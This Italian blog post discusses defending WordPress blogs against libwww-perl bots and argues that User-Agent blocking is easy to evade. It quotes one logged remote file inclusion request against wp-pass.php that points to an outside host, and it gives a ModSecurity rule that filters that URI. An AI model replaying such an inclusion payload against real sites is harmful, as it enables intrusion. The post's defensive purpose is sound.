Donncha ha rilasciato un post dal titolo “tenere lontani i libwww-perl bot ” usando il mod_rewrite e bloccando lo HTTP_USER_AGENT per prevenire attacchi. Questo comunque non sembra funzionare.

Il perché è presto detto, E’ semplice cambiare la stringa dello HTTP_USER_AGENT e l’attacco che si potrebbe verificare potrebbe non usare una stringa relativa allo user-agent standard quale libwww-perl user-agent . Inoltre, le possibilità che delegittimiate la lettura del vostro feed e di altri strumenti web che hanno accesso al vostro blog sono davvero tante.

Donncha’s mostra un esempio di questo attacco:

GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? …
“libwww-perl/5.805″

Questa richiesta sembrerebbe provare ad eseguire l’exploit tramite un RFI (Remote File Inclusion vulnerability) . Ma a quanto confermano BlogWatch e altri non sembrerebberi esserci vulnerabilità del genere sulla piattaforma Wordpress al momento.

Potrei pensare ad un bug nei vari themes/templates oppure nei plugin installati e disponibili online ma sul solo wp e sul file incriminato wp-pass.php non sembrano esserci bugs di questo tipo.

Alcune regole per tenere lontani questi bot potete trovarle all’interno di questa pagina

Comunque un altro modo per poter prevenire gli attacchi potrebbe avvenire attraverso l’uso di un firewall per Apache open source chiamato ModSecurity.

La regola, poi, dovrebbe essere la seguente:

SecFilterSelective REQUEST_URI "wp-pass.php?_wp_http_referer"

Naturalmente se dipendete da librerie libwww-perl non usate queste regole altrimenti potreste ritrovarvi con il blog non più funzionante.